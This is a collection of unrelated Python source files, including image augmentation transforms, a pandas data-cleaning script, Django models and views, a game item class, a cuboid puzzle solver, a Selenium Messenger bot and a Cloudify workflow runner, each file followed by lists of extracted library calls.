hsv = cv2.cvtColor(rgb, cv2.COLOR_RGB2HSV)
# hue
hsv[..., 0] = np.remainder(
360.0 * (hsv[..., 0] / 360.0 + 1.0 + self._hue), 360.0
)
# saturation
hsv[..., 1] = np.clip(hsv[..., 1] + self._saturation, 0.0, 1.0)
# value
hsv[..., 2] = np.clip(hsv[..., 2] + self._value, 0.0, 1.0)
rgb = cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)
# debug output
# cv2.imshow("transformed", rgb[..., ::-1])
raster[..., self._channels] = rgb
return raster
def transform_points(self, points: np.ndarray) -> np.ndarray:
if not self._apply:
return points
return points
class PiRandomContrastTransform(PiRandomTransform):
def __init__(
self,
contrast_min: float,
contrast_max: float,
probability: float,
channels: typing.List[int],
**kwargs,
):
super().__init__()
self._contrast_min = contrast_min
self._contrast_max = contrast_max
self._probability = probability
self._channels = channels
self._contrast = None
self._apply = None
def resample(self, random: np.random.RandomState):
self._apply = random.choice(
[True, False], p=[self._probability, 1.0 - self._probability]
)
if not self._apply:
self._contrast = None
return
self._contrast = random.uniform(low=self._contrast_min, high=self._contrast_max)
def transform_raster(
self, raster: np.ndarray, interpolation: str, fill_value: np.ndarray
) -> np.ndarray:
if not self._apply:
return raster
rgb = raster[..., self._channels]
# debug output
# cv2.imshow("input", rgb[..., ::-1])
mean = np.mean(rgb.reshape(-1, 3), axis=0).reshape(1, 1, 3)
rgb = np.clip((rgb - mean) * (1.0 + self._contrast) + mean, 0.0, 1.0)
# debug output
# cv2.imshow("transformed", rgb[..., ::-1])
raster[..., self._channels] = rgb
return raster
def transform_points(self, points: np.ndarray) -> np.ndarray:
if not self._apply:
return points
return points
class PiRandomBlurTransform(PiRandomTransform):
def __init__(
self,
blur_min: float,
blur_max: float,
probability: float,
channels: typing.List[int],
**kwargs,
):
super().__init__()
self._blur_min = blur_min
self._blur_max = blur_max
self._probability = probability
self._channels = channels
self._blur = None
def resample(self, random: np.random.RandomState):
self._apply = random.choice(
[True, False], p=[self._probability, 1.0 - self._probability]
)
if not self._apply:
self._blur = None
return
self._blur = random.uniform(low=self._blur_min, high=self._blur_max)
def transform_raster(
self, raster: np.ndarray, interpolation: str, fill_value: np.ndarray
) -> np.ndarray:
if not self._apply:
return raster
if self._blur == 0.0:
return raster
rgb = raster[..., self._channels]
rgb = cv2.GaussianBlur(rgb, (0, 0), sigmaX=self._blur)
raster[..., self._channels] = rgb
return raster
def transform_points(self, points: np.ndarray) -> np.ndarray:
if not self._apply:
return points
return points
| [
"numpy.clip",
"numpy.eye",
"cv2.warpAffine",
"numpy.ones",
"numpy.cos",
"cv2.cvtColor",
"numpy.sin",
"cv2.GaussianBlur",
"numpy.remainder"
] | [((4723, 4748), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (4729, 4748), True, 'import numpy as np\n'), ((4879, 4904), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (4885, 4904), True, 'import numpy as np\n'), ((5115, 5140), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (5121, 5140), True, 'import numpy as np\n'), ((5166, 5188), 'numpy.cos', 'np.cos', (['self._rotation'], {}), '(self._rotation)\n', (5172, 5188), True, 'import numpy as np\n'), ((5214, 5236), 'numpy.cos', 'np.cos', (['self._rotation'], {}), '(self._rotation)\n', (5220, 5236), True, 'import numpy as np\n'), ((5311, 5333), 'numpy.sin', 'np.sin', (['self._rotation'], {}), '(self._rotation)\n', (5317, 5333), True, 'import numpy as np\n'), ((5388, 5413), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (5394, 5413), True, 'import numpy as np\n'), ((5535, 5560), 'numpy.eye', 'np.eye', (['(3)'], {'dtype': 'np.float'}), '(3, dtype=np.float)\n', (5541, 5560), True, 'import numpy as np\n'), ((7103, 7292), 'cv2.warpAffine', 'cv2.warpAffine', ([], {'src': 'raster', 'M': 'self._matrix[:2, :]', 'dsize': '(self._output_width, self._output_height)', 'flags': 'interpolation_flag', 'borderMode': 'cv2.BORDER_CONSTANT', 'borderValue': 'fill_value'}), '(src=raster, M=self._matrix[:2, :], dsize=(self._output_width,\n self._output_height), flags=interpolation_flag, borderMode=cv2.\n BORDER_CONSTANT, borderValue=fill_value)\n', (7117, 7292), False, 'import cv2\n'), ((9530, 9566), 'cv2.cvtColor', 'cv2.cvtColor', (['rgb', 'cv2.COLOR_RGB2HSV'], {}), '(rgb, cv2.COLOR_RGB2HSV)\n', (9542, 9566), False, 'import cv2\n'), ((9604, 9672), 'numpy.remainder', 'np.remainder', (['(360.0 * (hsv[..., 0] / 360.0 + 1.0 + self._hue))', '(360.0)'], {}), '(360.0 * (hsv[..., 0] / 360.0 + 1.0 + self._hue), 360.0)\n', (9616, 9672), True, 'import numpy as np\n'), ((9739, 9788), 'numpy.clip', 'np.clip', (['(hsv[..., 1] + self._saturation)', '(0.0)', '(1.0)'], {}), '(hsv[..., 1] + self._saturation, 0.0, 1.0)\n', (9746, 9788), True, 'import numpy as np\n'), ((9828, 9872), 'numpy.clip', 'np.clip', (['(hsv[..., 2] + self._value)', '(0.0)', '(1.0)'], {}), '(hsv[..., 2] + self._value, 0.0, 1.0)\n', (9835, 9872), True, 'import numpy as np\n'), ((9888, 9924), 'cv2.cvtColor', 'cv2.cvtColor', (['hsv', 'cv2.COLOR_HSV2RGB'], {}), '(hsv, cv2.COLOR_HSV2RGB)\n', (9900, 9924), False, 'import cv2\n'), ((11413, 11476), 'numpy.clip', 'np.clip', (['((rgb - mean) * (1.0 + self._contrast) + mean)', '(0.0)', '(1.0)'], {}), '((rgb - mean) * (1.0 + self._contrast) + mean, 0.0, 1.0)\n', (11420, 11476), True, 'import numpy as np\n'), ((12809, 12857), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['rgb', '(0, 0)'], {'sigmaX': 'self._blur'}), '(rgb, (0, 0), sigmaX=self._blur)\n', (12825, 12857), False, 'import cv2\n'), ((5263, 5285), 'numpy.sin', 'np.sin', (['self._rotation'], {}), '(self._rotation)\n', (5269, 5285), True, 'import numpy as np\n'), ((7634, 7672), 'numpy.ones', 'np.ones', (['(num_points,)'], {'dtype': 'np.float'}), '((num_points,), dtype=np.float)\n', (7641, 7672), True, 'import numpy as np\n')] |
#!/usr/bin/python
import pandas as pd
import numpy as np
# code to gather together the code
# I am working from the CollegeSprint folder
import os
path = "/home/debasish/Desktop/CollegeSprint/Files"
file_list = sorted(os.listdir(path))
mainFrame = pd.DataFrame()
delcol = ['eob_id','batch_arrival_time','eob_plan_type','eob_patient_account_number',
'eob_claim_type','batch_deposit_date','payer_id','claim_information_id',
'eob_payer','payid','eob_service_line','eob_min_date_of_service_from','eob_max_date_of_service_to']
for file in file_list:
eachFilePath = path + '/' + file
df = pd.read_csv(eachFilePath, header=0)
df = df.dropna(axis=0, how='all', subset=delcol)
mainFrame = mainFrame.append(df, ignore_index=True)
mainFrame.to_csv('output.csv', index = False)
#code to clean the code further, as we above deleted only rows where all the delcol were null simultaneously.
df = pd.read_csv('output.csv', header=0)
#check no of nulls in columns still
df1 = df.isnull().sum()
df1[df1 > 0]
#output
#claim_payer_name 4
#eob_plan_type 13
#eob_claim_type 13
#check the no of unique data in these columns
nullcol = df1[df1 > 0].index
for col in nullcol:
print(col,":",len(df[col].unique()))
#output
#claim_payer_name : 11233
#eob_plan_type : 36
#eob_claim_type : 8
#delete the rows that has claim_payer_name null. We are doing this as it has many unique values
#We will impute the other two columns
df = df.dropna(axis=0, subset=['claim_payer_name'])
#we see both the columns are null together
df1 = df[(df['eob_plan_type'].isnull())]
df1[['eob_plan_type','eob_claim_type']]
#impute the 13 null entries of each column with the mode
df['eob_plan_type'] = df['eob_plan_type'].fillna(df['eob_plan_type'].mode().astype(str).iloc[0])
df['eob_claim_type'] = df['eob_claim_type'].fillna(df['eob_claim_type'].mode().astype(str).iloc[0])
df.to_csv('outputCleaned.csv', index = False)
| [
"pandas.DataFrame",
"os.listdir",
"pandas.read_csv"
] | [((254, 268), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (266, 268), True, 'import pandas as pd\n'), ((902, 937), 'pandas.read_csv', 'pd.read_csv', (['"""output.csv"""'], {'header': '(0)'}), "('output.csv', header=0)\n", (913, 937), True, 'import pandas as pd\n'), ((223, 239), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (233, 239), False, 'import os\n'), ((596, 631), 'pandas.read_csv', 'pd.read_csv', (['eachFilePath'], {'header': '(0)'}), '(eachFilePath, header=0)\n', (607, 631), True, 'import pandas as pd\n')] |
from django.db import models
from django.utils import timezone
from django.urls import reverse
from django.contrib.auth.models import User
from user_auth.choices import *
def upload_room_images(instance,filename):
return "Room/Images/{room}/{filename}/".format(room=instance.room,filename=filename)
def upload_cover_image(instance,filename):
return "Room/cover/{id}/{filename}/".format(id=instance.id,filename=filename)
class Room(models.Model):
ownner = models.ForeignKey(User, on_delete=models.CASCADE)
state = models.CharField(choices = STATES_UNION_TERRITORIES,blank=False, max_length=256 )
city_area = models.CharField(blank=False, max_length=256)
street_address = models.CharField(blank=False, max_length=300)
mobile = models.BigIntegerField(blank=False)
room_status = models.CharField(blank=False, max_length=10)
religious_group = models.CharField(choices = RELIGIOUS_GROUP , max_length=15)
monthly_rent = models.CharField(blank=False,max_length=10)
desciption = models.TextField(blank=True,max_length=2048)
added_date = models.DateTimeField(auto_now=True)
cover_image = models.ImageField(upload_to =upload_cover_image, blank=False )
def __str__(self):
return "Room-{id}".format(id=str(self.id))
class RoomImages(models.Model):
room = models.ForeignKey(Room, on_delete=models.CASCADE ,related_name='room_images')
room_image = models.ImageField(upload_to=upload_room_images,null=False, blank=False)
def get_absolute_url(self):
return reverse("room_service:room_list")
def __str__(self):
return str(self.room)
| [
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.ImageField",
"django.db.models.BigIntegerField",
"django.urls.reverse",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((472, 521), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (489, 521), False, 'from django.db import models\n'), ((534, 613), 'django.db.models.CharField', 'models.CharField', ([], {'choices': 'STATES_UNION_TERRITORIES', 'blank': '(False)', 'max_length': '(256)'}), '(choices=STATES_UNION_TERRITORIES, blank=False, max_length=256)\n', (550, 613), False, 'from django.db import models\n'), ((632, 677), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(False)', 'max_length': '(256)'}), '(blank=False, max_length=256)\n', (648, 677), False, 'from django.db import models\n'), ((699, 744), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(False)', 'max_length': '(300)'}), '(blank=False, max_length=300)\n', (715, 744), False, 'from django.db import models\n'), ((758, 793), 'django.db.models.BigIntegerField', 'models.BigIntegerField', ([], {'blank': '(False)'}), '(blank=False)\n', (780, 793), False, 'from django.db import models\n'), ((812, 856), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(False)', 'max_length': '(10)'}), '(blank=False, max_length=10)\n', (828, 856), False, 'from django.db import models\n'), ((879, 935), 'django.db.models.CharField', 'models.CharField', ([], {'choices': 'RELIGIOUS_GROUP', 'max_length': '(15)'}), '(choices=RELIGIOUS_GROUP, max_length=15)\n', (895, 935), False, 'from django.db import models\n'), ((958, 1002), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(False)', 'max_length': '(10)'}), '(blank=False, max_length=10)\n', (974, 1002), False, 'from django.db import models\n'), ((1019, 1064), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(2048)'}), '(blank=True, max_length=2048)\n', (1035, 1064), False, 'from django.db import models\n'), ((1081, 1116), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (1101, 1116), False, 'from django.db import models\n'), ((1135, 1195), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': 'upload_cover_image', 'blank': '(False)'}), '(upload_to=upload_cover_image, blank=False)\n', (1152, 1195), False, 'from django.db import models\n'), ((1319, 1396), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Room'], {'on_delete': 'models.CASCADE', 'related_name': '"""room_images"""'}), "(Room, on_delete=models.CASCADE, related_name='room_images')\n", (1336, 1396), False, 'from django.db import models\n'), ((1414, 1486), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': 'upload_room_images', 'null': '(False)', 'blank': '(False)'}), '(upload_to=upload_room_images, null=False, blank=False)\n', (1431, 1486), False, 'from django.db import models\n'), ((1534, 1567), 'django.urls.reverse', 'reverse', (['"""room_service:room_list"""'], {}), "('room_service:room_list')\n", (1541, 1567), False, 'from django.urls import reverse\n')] |
import random
from .consts import ITEM_SLOT_ARMOR, ITEM_SLOT_WEAPON
from .utility import get_random_array_element
class Item:
weapon_list = {}
armor_list = {}
def __init__(self, level: int, slot: int):
if slot == ITEM_SLOT_WEAPON:
self.affix = get_random_array_element(Item.weapon_list["affixes"])
self.type = get_random_array_element(Item.weapon_list["types"])
self.suffix = get_random_array_element(Item.weapon_list["suffixes"])
if slot == ITEM_SLOT_ARMOR:
self.affix = get_random_array_element(Item.armor_list["affixes"])
self.type = get_random_array_element(Item.armor_list["types"])
self.suffix = get_random_array_element(Item.armor_list["suffixes"])
self.level = round(random.random() * level + 1)
self.slot = slot
self.owner = None
@property
def name(self) -> str:
if self.owner is None:
return self._name
else:
return "{0} {1} {2}".format(self.owner.trans.get_message(self.affix, self.owner.locale,
connected_word=self.type),
self.owner.trans.get_message(self.type, self.owner.locale),
self.owner.trans.get_message(self.suffix, self.owner.locale))
def name_in_form(self, is_ablative: bool = False, is_accusative: bool = False) -> str:
if self.owner is None:
return self._name
else:
return "{0} {1} {2}".format(self.owner.trans.get_message(self.affix, self.owner.locale,
connected_word=self.type, is_ablative=is_ablative,
is_accusative=is_accusative),
self.owner.trans.get_message(self.type, self.owner.locale,
is_ablative=is_ablative,
is_accusative=is_accusative),
self.owner.trans.get_message(self.suffix, self.owner.locale))
@property
def _name(self) -> str:
return "{0} {1} {2}".format(self.affix, self.type, self.suffix)
@property
def price(self) -> int:
return self.level * 250
@property
def attack(self) -> int:
res = 0
if self.slot == ITEM_SLOT_WEAPON:
res = self.level
return res
@property
def defence(self) -> int:
res = 0
if self.slot == ITEM_SLOT_ARMOR:
res = self.level
return res
# recover parts of name from result string
def set_name(self, name: str):
parts = name.split(" ")
# TODO: rewrite completely
pos = 0
self.affix = ""
while pos < len(parts):
if len(self.affix) > 0:
self.affix += " "
self.affix += parts[pos]
pos += 1
self.affix = self.affix.strip()
if self.slot == ITEM_SLOT_WEAPON:
if self.affix in Item.weapon_list["affixes"]:
break
elif self.slot == ITEM_SLOT_ARMOR:
if self.affix in Item.armor_list["affixes"]:
break
self.type = ""
while pos < len(parts):
if len(self.type) > 0:
self.type += " "
self.type += parts[pos]
pos += 1
self.type = self.type.strip()
if self.slot == ITEM_SLOT_WEAPON:
if self.type in Item.weapon_list["types"]:
break
elif self.slot == ITEM_SLOT_ARMOR:
if self.type in Item.armor_list["types"]:
break
self.suffix = ""
while pos < len(parts):
if len(self.suffix) > 0:
self.suffix += " "
self.suffix += parts[pos]
pos += 1
self.suffix = self.suffix.strip()
if self.slot == ITEM_SLOT_WEAPON:
if self.suffix in Item.weapon_list["suffixes"]:
break
elif self.slot == ITEM_SLOT_ARMOR:
if self.suffix in Item.armor_list["suffixes"]:
break
def equip(self, owner):
self.owner = owner
if self.slot == ITEM_SLOT_WEAPON:
owner.weapon = self
elif self.slot == ITEM_SLOT_ARMOR:
owner.armor = self
def translate(self, is_ablative: bool = False, is_accusative: bool = False) -> str:
return "{0} + {1}".format(self.name_in_form(is_ablative=is_ablative, is_accusative=is_accusative), self.level)
def __str__(self):
return "{0} + {1}".format(self.name, self.level)
| [
"random.random"
] | [((787, 802), 'random.random', 'random.random', ([], {}), '()\n', (800, 802), False, 'import random\n')] |
# Generated by Django 3.2.7 on 2021-12-13 15:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('order', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='order',
name='additional',
field=models.TextField(null=True),
),
]
| [
"django.db.models.TextField"
] | [((326, 353), 'django.db.models.TextField', 'models.TextField', ([], {'null': '(True)'}), '(null=True)\n', (342, 353), False, 'from django.db import migrations, models\n')] |
from copy import copy
from collections import defaultdict, namedtuple
with open("day22.in") as f:
# with open("day22.small.in") as f:
lines = f.read().splitlines()
reactor = defaultdict(bool)
for line in lines[:20]:
# on x=0..45,y=-21..27,z=-28..20
# print(line)
switch, coords = line.split()
x, y, z = coords.split(",")
xmin, xmax = [int(v) for v in x.split("=")[1].split("..")]
ymin, ymax = [int(v) for v in y.split("=")[1].split("..")]
zmin, zmax = [int(v) for v in z.split("=")[1].split("..")]
for x in range(xmin, xmax + 1):
for y in range(ymin, ymax + 1):
for z in range(zmin, zmax + 1):
reactor[(x, y, z)] = True if switch == "on" else False
print(sum([1 if v else 0 for v in reactor.values()]))
class Range(object):
def __init__(self, rmin, rmax):
self.rmin = rmin
self.rmax = rmax
def span(self):
return abs(self.rmax - self.rmin + 1)
def contains(self, block):
return self.rmin <= block <= self.rmax
def overlaps(self, other):
return self.contains(other.rmin) or self.contains(other.rmax)
def includes(self, other):
return self.contains(other.rmin) and self.contains(other.rmax)
def intersection(self, other):
if self.includes(other):
return other
if other.includes(self):
return self
if not self.overlaps(other):
return None
if self.contains(other.rmin) and self.contains(other.rmax):
return Range(other.rmin, other.rmax)
elif self.contains(other.rmin):
return Range(other.rmin, self.rmax)
elif self.contains(other.rmax):
return Range(self.rmin, other.rmax)
def __str__(self):
return "%d..%d" % (self.rmin, self.rmax)
class Cuboid(object):
def __init__(self, xrange, yrange, zrange, on):
self.xrange = xrange
self.yrange = yrange
self.zrange = zrange
self.on = on
self.exclusions = []
def volume(self):
return self.xrange.span() * self.yrange.span() * self.zrange.span()
def exclusive_volume(self):
return (self.xrange.span() * self.yrange.span() * self.zrange.span() -
sum([e.exclusive_volume() for e in self.exclusions]))
def contains(self, other):
return all([self.xrange.includes(other.xrange),
self.yrange.includes(other.yrange),
self.zrange.includes(other.zrange)])
def intersect(self, other):
xint = self.xrange.intersection(other.xrange)
yint = self.yrange.intersection(other.yrange)
zint = self.zrange.intersection(other.zrange)
if all([intersection is not None for intersection in [xint, yint, zint]]):
overlap = Cuboid(xint, yint, zint, other.on)
return overlap
else:
return None
def exclude(self, other):
overlap = self.intersect(other)
if not overlap:
return
for e in self.exclusions:
e.exclude(overlap)
self.exclusions.append(overlap)
return overlap
def num_on(self):
return self.exclusive_volume() if self.on else 0
def __str__(self):
return "Cuboid(x=%s,y=%s,z=%s,%s)" % (self.xrange, self.yrange, self.zrange, self.on)
original_cubes = []
for line in lines:
# on x=0..45,y=-21..27,z=-28..20
# print(line)
switch, coords = line.split()
x, y, z = coords.split(",")
xmin, xmax = [int(v) for v in x.split("=")[1].split("..")]
ymin, ymax = [int(v) for v in y.split("=")[1].split("..")]
zmin, zmax = [int(v) for v in z.split("=")[1].split("..")]
c = Cuboid(Range(xmin, xmax), Range(ymin, ymax), Range(zmin, zmax), switch == "on")
original_cubes.append(c)
for i, ic in enumerate(original_cubes):
for j, jc in enumerate(original_cubes):
if i < j:
original_cubes[i].exclude(original_cubes[j])
print(sum([c.num_on() for c in original_cubes]))
| [
"collections.defaultdict"
] | [((180, 197), 'collections.defaultdict', 'defaultdict', (['bool'], {}), '(bool)\n', (191, 197), False, 'from collections import defaultdict, namedtuple\n')] |
# Generated by Django 3.1.7 on 2021-03-26 08:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='MuscleGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('description', models.TextField(blank=True, max_length=1000)),
('benefits', models.TextField(blank=True, max_length=1000)),
('basics', models.TextField(blank=True, max_length=1000)),
],
),
migrations.CreateModel(
name='Muscle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('description', models.TextField(blank=True, max_length=1000)),
('basics', models.TextField(blank=True, max_length=1000)),
('muscle_group', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='body.musclegroup')),
],
),
]
| [
"django.db.models.TextField",
"django.db.models.AutoField",
"django.db.models.CharField",
"django.db.models.ForeignKey"
] | [((340, 433), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (356, 433), False, 'from django.db import migrations, models\n'), ((457, 489), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (473, 489), False, 'from django.db import migrations, models\n'), ((524, 569), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), '(blank=True, max_length=1000)\n', (540, 569), False, 'from django.db import migrations, models\n'), ((601, 646), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), '(blank=True, max_length=1000)\n', (617, 646), False, 'from django.db import migrations, models\n'), ((676, 721), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), '(blank=True, max_length=1000)\n', (692, 721), False, 'from django.db import migrations, models\n'), ((853, 946), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (869, 946), False, 'from django.db import migrations, models\n'), ((970, 1002), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (986, 1002), False, 'from django.db import migrations, models\n'), ((1037, 1082), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), '(blank=True, max_length=1000)\n', (1053, 1082), False, 'from django.db import migrations, models\n'), ((1112, 1157), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'max_length': '(1000)'}), '(blank=True, max_length=1000)\n', (1128, 1157), False, 'from django.db import migrations, models\n'), ((1193, 1294), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'null': '(True)', 'on_delete': 'django.db.models.deletion.SET_NULL', 'to': '"""body.musclegroup"""'}), "(null=True, on_delete=django.db.models.deletion.SET_NULL,\n to='body.musclegroup')\n", (1210, 1294), False, 'from django.db import migrations, models\n')] |
from shaape.parser import Parser
import nose
import unittest
from nose.tools import *
class TestParser(unittest.TestCase):
def test_init(self):
parser = Parser()
assert parser != None
assert parser.parsed_data() == []
assert parser.drawable_objects() == []
def test_run(self):
parser = Parser()
assert_raises(NotImplementedError, parser.run, "", [])
| [
"shaape.parser.Parser"
] | [((166, 174), 'shaape.parser.Parser', 'Parser', ([], {}), '()\n', (172, 174), False, 'from shaape.parser import Parser\n'), ((336, 344), 'shaape.parser.Parser', 'Parser', ([], {}), '()\n', (342, 344), False, 'from shaape.parser import Parser\n')] |
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import render, redirect
from .forms import *
from .models import *
from django.contrib import messages
# Create your views here.
from django.views import View
# def index(request):
# return render(request, 'product/create_product.html')
#
#
# class ProtectView(LoginRequiredMixin, View):
# def get(self, request):
# return render(request, 'product/create_product.html')
def create_product_category(request):
form = ProductCategoryCreateForm
if request.method == 'POST':
form = ProductCategoryCreateForm(request.POST)
if form.is_valid():
form.save()
return redirect('product:create_category')
category = ProductCategory.objects.all()
ctx = {
'form': form,
'category': category
}
return render(request, 'product/create_product_category.html', ctx)
def create_product(request):
form = ProductCreateForm
if request.method == 'POST':
form = ProductCreateForm(request.POST)
if form.is_valid():
form.save()
messages.success(request, 'Product Created Successfully')
return redirect('product:list')
ctx = {
'form': form,
}
return render(request, 'product/create_product.html', ctx)
def product_list(request):
product = Product.objects.all()
ctx = {
'product': product,
}
return render(request, 'product/product_list.html', ctx)
| [
"django.shortcuts.render",
"django.shortcuts.redirect",
"django.contrib.messages.success"
] | [((864, 924), 'django.shortcuts.render', 'render', (['request', '"""product/create_product_category.html"""', 'ctx'], {}), "(request, 'product/create_product_category.html', ctx)\n", (870, 924), False, 'from django.shortcuts import render, redirect\n'), ((1282, 1333), 'django.shortcuts.render', 'render', (['request', '"""product/create_product.html"""', 'ctx'], {}), "(request, 'product/create_product.html', ctx)\n", (1288, 1333), False, 'from django.shortcuts import render, redirect\n'), ((1456, 1505), 'django.shortcuts.render', 'render', (['request', '"""product/product_list.html"""', 'ctx'], {}), "(request, 'product/product_list.html', ctx)\n", (1462, 1505), False, 'from django.shortcuts import render, redirect\n'), ((703, 738), 'django.shortcuts.redirect', 'redirect', (['"""product:create_category"""'], {}), "('product:create_category')\n", (711, 738), False, 'from django.shortcuts import render, redirect\n'), ((1129, 1186), 'django.contrib.messages.success', 'messages.success', (['request', '"""Product Created Successfully"""'], {}), "(request, 'Product Created Successfully')\n", (1145, 1186), False, 'from django.contrib import messages\n'), ((1206, 1230), 'django.shortcuts.redirect', 'redirect', (['"""product:list"""'], {}), "('product:list')\n", (1214, 1230), False, 'from django.shortcuts import render, redirect\n')] |
from gensim.models import Word2Vec
from gensim.models.keyedvectors import KeyedVectors
import numpy as np
word_vectors = KeyedVectors.load_word2vec_format('../data/cn.skipgram.bin/cn.skipgram.bin', binary=True,
unicode_errors='ignore')
# 距离,越大表示越不相似
print(word_vectors.wmdistance(['中国', '打败', '美国'], ['游戏', '好玩']))
print(word_vectors.wmdistance(['游戏', '好玩'], ['游戏', '好玩']))
print(word_vectors.wmdistance(['中国', '打败', '美国'], ['中国', '打败', '美国']))
print(word_vectors.wmdistance(['中国', '打败', '美国'], ['美国', '中国', '打败']))
| [
"gensim.models.keyedvectors.KeyedVectors.load_word2vec_format"
] | [((122, 240), 'gensim.models.keyedvectors.KeyedVectors.load_word2vec_format', 'KeyedVectors.load_word2vec_format', (['"""../data/cn.skipgram.bin/cn.skipgram.bin"""'], {'binary': '(True)', 'unicode_errors': '"""ignore"""'}), "('../data/cn.skipgram.bin/cn.skipgram.bin',\n binary=True, unicode_errors='ignore')\n", (155, 240), False, 'from gensim.models.keyedvectors import KeyedVectors\n')] |
from selenium.webdriver.remote.webdriver import WebDriver
from actions.handlers import hello, corona
import re
regex = re.compile('^bleep blop')
def login(browser: WebDriver, username: str, pwd: str) -> WebDriver:
browser.get('https://mbasic.facebook.com/messages/')
browser.find_element_by_css_selector('#login_form input[name="email"]').send_keys(username)
browser.find_element_by_css_selector('#login_form input[name="pass"]').send_keys(pwd)
browser.find_element_by_css_selector('#login_form input[type="submit"][name="login"]').click()
return browser
def open_chat(browser: WebDriver, id: str) -> WebDriver:
browser.get('https://mbasic.facebook.com/messages/read/?tid=cid.' + id)
return browser
def check_message(browser: WebDriver) -> list:
ret_m = []
skip_texts = ['', 'Sent from Mobile', 'Sent from Messenger', 'Sent from Web']
messages = browser.find_elements_by_css_selector('#messageGroup > div:nth-child(2) span')
for message in messages:
text = message.text
if text in skip_texts:
continue
if regex.match(text):
ret_m = []
ret_m.append(text)
return ret_m
def reply_message(browser: WebDriver, input_text: str) -> WebDriver:
def _send_message(t: str, wb: WebDriver = browser) -> callable:
wb.find_element_by_id('composerInput').send_keys(t)
wb.find_element_by_css_selector('#composer_form input[type="submit"][name="send"]').click()
flag = hello.handle(_send_message, input_text) \
or corona.handle(_send_message, input_text)
if flag:
_send_message('bleep blop')
return browser
| [
"actions.handlers.hello.handle",
"actions.handlers.corona.handle",
"re.compile"
] | [((120, 145), 're.compile', 're.compile', (['"""^bleep blop"""'], {}), "('^bleep blop')\n", (130, 145), False, 'import re\n'), ((1489, 1528), 'actions.handlers.hello.handle', 'hello.handle', (['_send_message', 'input_text'], {}), '(_send_message, input_text)\n', (1501, 1528), False, 'from actions.handlers import hello, corona\n'), ((1545, 1585), 'actions.handlers.corona.handle', 'corona.handle', (['_send_message', 'input_text'], {}), '(_send_message, input_text)\n', (1558, 1585), False, 'from actions.handlers import hello, corona\n')] |
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import argparse
from cloudify_rest_client import CloudifyClient
from cloudify.workflows import local
if __name__ == '__main__':
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('workflow')
arg_parser.add_argument('blueprint_path')
arg_parser.add_argument('--name', default='local')
arg_parser.add_argument('--storage_dir', default='/tmp/cloudify-workflows')
arg_parser.add_argument('--init', action='store_true')
arg_parser.add_argument('--bootstrap', action='store_true')
arg_parser.add_argument('--pool-size', type=int, default=1)
args = arg_parser.parse_args()
storage = local.FileStorage(args.storage_dir)
name = args.name
if args.init:
env = local.init_env(args.blueprint_path, name=name, storage=storage)
else:
env = local.load_env(name=name, storage=storage)
env.execute(args.workflow,
task_retries=3,
task_retry_interval=1,
task_thread_pool_size=args.pool_size)
if args.bootstrap:
outputs = env.outputs()
provider = outputs['provider']['value']
provider_context = provider['context'][0] or {}
